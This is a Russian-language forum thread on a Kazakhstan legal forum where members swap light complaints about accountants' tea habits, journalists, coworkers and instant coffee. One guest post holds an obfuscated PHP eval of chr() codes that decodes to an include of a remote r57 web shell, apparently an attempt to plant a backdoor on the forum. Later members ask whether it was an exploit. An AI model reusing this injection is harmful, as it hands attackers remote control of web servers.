Перейти к контенту
КАЗАХСТАНСКИЙ ЮРИДИЧЕСКИЙ ФОРУМ

Рекомендуемые сообщения

Опубликовано

С утра такой негатив!? :umnik: Смотрите какая погода за окном, вспомните, что седня пятница!

Будте терпимее. :biggrin:

Весна!

post-6771-1141964049.gif

• Ответы 141
  • Created
  • Последний ответ

Top Posters In This Topic

Опубликовано

А им это удобно. Партачят бухгалтеры, ... Надо жестко работать с ВСЕМИ исполнителями (включая бухгалтерию). Гонять, втыкать, расстреливать, писать служебки руководству, выявлять все малейшие недостатки. Наказания, штрафы. Вот так их ...

Als, помилуйте, зачем так жестоко… Да еще с элементами собственного превосходства и подставы. Почему нельзя просто работать вместе на благо процветания фирмы, где каждый выполняет свои должностные обязанности? :biggrin:
Опубликовано

Als, помилуйте, зачем так жестоко… Да еще с элементами собственного превосходства и подставы.

Господь меня спаси. :biggrin: По собственному превосходству (расизму, шовинизму и др.измам) - это вообще не ко мне, а к Адольфу... Гитлеру. А упоминаемая ситуация (ответственность юр.отдела за партаки бухгалтерии (как и других отделов)) не подстава (со стороны бухгалтерии или др.отделов), а осуществление трудовых обязанностей. Отвечать за предприятие в судах и др.гос.органах и т.д. все равно юристы будут - это вполне пормально.

Почему нельзя просто работать вместе на благо процветания фирмы, где каждый выполняет свои должностные обязанности? :horn:

Работаем... вместе... :umnik: Без бухгалтерии предприятию вообще никуда.

п.с. Вопрос не по теме. Кстати, почему на всех предприятиях бухгалтерия ежечасно пьет чай? :umnik: Как его можно целый день пить. :horn: (наши раз 10 в день пьют).

Опубликовано

:biggrin:

Чай, к сожалению, искоренить невозможно. Я пробовал - не получается. Это профессиональное и необходимое. Как посещение курилки.

Опубликовано

Дааа, насчет бухгалтерии это истинная правда.... :umnik:

ООО чень редко встречаются стройные бухгалтера.......

А меня бесит, когда какой-нибудь исполнитель пытается учить тебя как работать.. :horn: Постоянная борьба с ними :umnik:

Быстрей бы им заключить договор - и все по фигу, а потом какие будут последствия - абсолютно все равно!!!! :biggrin:

Опубликовано

Ребята, давайте жить дружно! :umnik:

Не понимаю, почему кто-то кого-то должен ненавидеть?! :umnik:

Вот нас, журналистов, ненавидят люди всех тех специальностей, которые вы перечисляли выше. Ох люто ненавидят нас чиновники любого министерства, департамента, агентства или комитета. :biggrin:

Собственно и вы, господа юристы, нас не долюбливаете, что уже кривить душой.

Я бы тоже могла написать огромный список тех, кого по идее должна ненавидеть. Но... Приходиться всех любить, ведь только любовь и ласка могут пробить черствое сердце госслужащего. С улыбкой надо ко всему подходить, с улыбкой! :horn:

А вот ненавижу я тупость человеческую, но ведь людей, наделенных ею, можно встретить в любой профессии. Министры бывают тупыми и сантехники. Тут уж ничего не поделаешь.

Опубликовано

Дааа, насчет бухгалтерии это истинная правда.... :horn:

ООО чень редко встречаются стройные бухгалтера.......

А меня бесит, когда какой-нибудь исполнитель пытается учить тебя как работать.. :horn: Постоянная борьба с ними :umnik:

Быстрей бы им заключить договор - и все по фигу, а потом какие будут последствия - абсолютно все равно!!!! :umnik:

Моя мама бухгалтер...и она стройная...а чай пьет только за обедом... :biggrin:

Опубликовано

а как вам просьба - "помогите нам юридически подшить договор"? :biggrin:

не, лучше вопрос: - Как это по-юридически правильно 8)

Опубликовано

Моя мама бухгалтер...и она стройная...а чай пьет только за обедом... :biggrin:

Уважаемая, G_page, не обижайтесь, практика показывает в "в каждом правиле есть исключения"

п.с.: я же не сказала, что все....я сказала ОООчень редко, соответственно все таки встречаются!!

Опубликовано (изменено)

Ребята, давайте жить дружно! :umnik:

Не понимаю, почему кто-то кого-то должен ненавидеть?! :horn:

Вопрос вообще был "это" или "что то" ненавижу (лучше было вообще сказать "раздражает" или "не нравится"). То бишь говорим о ситуацих \ поведении\ погоду и т.д., а не конкретных профессиях и т.д.

Журналистика вообще профессия родственная юристам. Правовое государство и демократия может существовать только при сильных СМИ и качественной правовой культуре.

А споры чья профессия важнее и нужна - это из басни "что важнее, рука или нога".

п.с. Чай на работе вообще не пью. Принципиально. :biggrin: :umnik:

Изменено пользователем Als Fess
Опубликовано

не, лучше вопрос: - Как это по-юридически правильно 8)

А как Вам это: "А как это будет с точки зрения юриспруденции?"

Гость СЧАСТЬЕ_И_УДАЧА
Опубликовано

Ребята, давайте жить дружно! :suspect:

Не понимаю, почему кто-то кого-то должен ненавидеть?! :biggrin:

Вот нас, журналистов, ненавидят люди всех тех специальностей, которые вы перечисляли выше. Ох люто ненавидят нас чиновники любого министерства, департамента, агентства или комитета. :bow:

Собственно и вы, господа юристы, нас не долюбливаете, что уже кривить душой.

Я бы тоже могла написать огромный список тех, кого по идее должна ненавидеть. Но... Приходиться всех любить, ведь только любовь и ласка могут пробить черствое сердце госслужащего. С улыбкой надо ко всему подходить, с улыбкой! :hb:

А вот ненавижу я тупость человеческую, но ведь людей, наделенных ею, можно встретить в любой профессии. Министры бывают тупыми и сантехники. Тут уж ничего не поделаешь.

Среди министров тупых все таки меньше - хотя наверное нечестных больше

И вообще тема то называется "а это ненавижу", а не "а этих ненавижу"

не то чтобы ненавижу, скорее не люблю когда "не в тему"

хотя себе конечно все прощаю

Опубликовано

Als, помилуйте, зачем так жестоко… Да еще с элементами собственного превосходства и подставы. Почему нельзя просто работать вместе на благо процветания фирмы, где каждый выполняет свои должностные обязанности? :biggrin:

Да, верно, командный подход или мозговой штурм (как хотите) помогает решить многие проблемы или задачи.

НЕ нравится, когда кто-нить выделывается. Особенно, при отсутствии соображения... :suspect:

• 4 weeks later...
Опубликовано

:druzja:

Чай, к сожалению, искоренить невозможно. Я пробовал - не получается. Это профессиональное и необходимое. Как посещение курилки.

Андрэ, хочу с вами поделиться, и не только бухгалтера любят чаепитие, но и юристы, причем многие, страдают этим милым пороком тоже. Я тоже не исключение, а скорее правило - большая любительница кофе и пью его на работе беспрестанно, но, чтобы не вызывать праведный гнев со стороны сослуживцев, использую некоторые хитрости: диспенсер гостит от меня в двух шагах, кофе не натуральный (натуральный требует определенных временных затрат и наличия кофеварки), а растворимый – «Картье», вполне приличный вкус. И получается, когда я хочу кофе, я делаю это не отрываясь так сказать, от производственного процесса - глядя в монитор и не прерывая мыслительного процесса. При этом необходимо соблюдать два правила: первое - помнить, куда поставил кружку, чтобы не залить важные бумаги и самое главное не вовлекать в этот процесс коллег, ну а если все же кто-то составил вам компанию, не развивать спорные темы или темы, требующие длительных рассуждений, не касающиеся работы, т.е. делать это максимально быстро.

Опубликовано (изменено)

диспенсер гостит от меня в двух шагах, кофе не натуральный (натуральный требует определенных временных затрат и наличия кофеварки), а растворимый – «Картье», вполне приличный вкус.

Сакура как всегда не упустит случая похвалить и создать рекламу блюду :leb::druzja::leb:

Сразу чувтсвуется хозяйка Грибоедова. :leb:

А если серьезно то в каждой профессии есть косяки. :leb:

Это уже от человека а не от професии.

Не люблю когда чей то косят пытаются в наглую повесить на тебя, когда все белыми нитками. :leb:

Изменено пользователем M9300
Опубликовано

Сакура как всегда не упустит случая похвалить и создать рекламу блюду :leb::druzja::leb:

Мансур!

Спасибо за комплимент… :leb:

То, что в моих постах звучит возможно как реклама, носит исключительно рекомендательный характер, продиктованный личным вкусом… в данном случае трудно найти достойную замену натуральному кофе, изжаренному, смолотому и сваренному тобой. Я смею заверить, что мной были перепробованы почти все марки растворимого кофе, всевозможных производителей…

Таким образом, эта марка кофе меня вполне устраивает, так же и по той причине, что отправным сырьем является арабика, но при этом надо учитывать так же тот факт, что у каждого вкус индивидуален… :leb:

Опубликовано (изменено)

Мансур!

Спасибо за комплимент… :druzja:

То, что в моих постах звучит возможно как реклама, носит исключительно рекомендательный характер, продиктованный личным вкусом… в данном случае трудно найти достойную замену натуральному кофе, изжаренному, смолотому и сваренному тобой. Я смею заверить, что мной были перепробованы почти все марки растворимого кофе, всевозможных производителей…

Таким образом, эта марка кофе меня вполне устраивает, так же и по той причине, что отправным сырьем является арабика, но при этом надо учитывать так же тот факт, что у каждого вкус индивидуален… :leb:

Все равно спасибо,сорри, имя не знаю :leb:

Но у меня есть возможность пить натуральный в буфете.

Не примену случаем и попробую по Вашей рекомендации. Спасибо :leb:

У нас в настоящее время Картье нет в буфете.

Не помню названия натурального кофе кажется "Illy"

Изменено пользователем M9300
  • 2 weeks later...
Опубликовано

<font color='#F660AB'>..я ненавижу рано утром новость об отсутствии горячей воды :lol:</font>

Ладно бы ещё горячей, а вот когда и холодной нет.... :biggrin:

Опубликовано

Вот нас, журналистов, ненавидят люди всех тех специальностей, которые вы перечисляли выше. Ох люто ненавидят нас чиновники любого министерства, департамента, агентства или комитета.

скорее не ненавидят а недолюбливают :lol:

спрашиваеться за что?

а за то-что когда журналистам говоришь одно, они печтатают так как они захотят :biggrin:

любимая фраза для журналистов- без комментариев :lol:

Гость Фаркаш
Опубликовано

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

человечек пытался эксплоитом форум завалить?

• 3 years later...
Опубликовано

человечек пытался эксплоитом форум завалить?

эт как в анекдоте "у меня скорость печатания - тысяча знаков в минуту, правда... такая фигня получается!"

Опубликовано

Не навижу предательства от друзей....

Ну тогда это не друзья... у меня нет друзей... вообще... только знакомые. И предать могут все, даже Вы, даж я, даже все... в определенных обстоятельствах.

• Недавно просматривали   0 пользователей

• Ни один зарегистрированный пользователь не просматривает эту страницу.
  • Upcoming Events

No upcoming events found
  • Recent Event Reviews

Важная информация

Правила форума Условия использования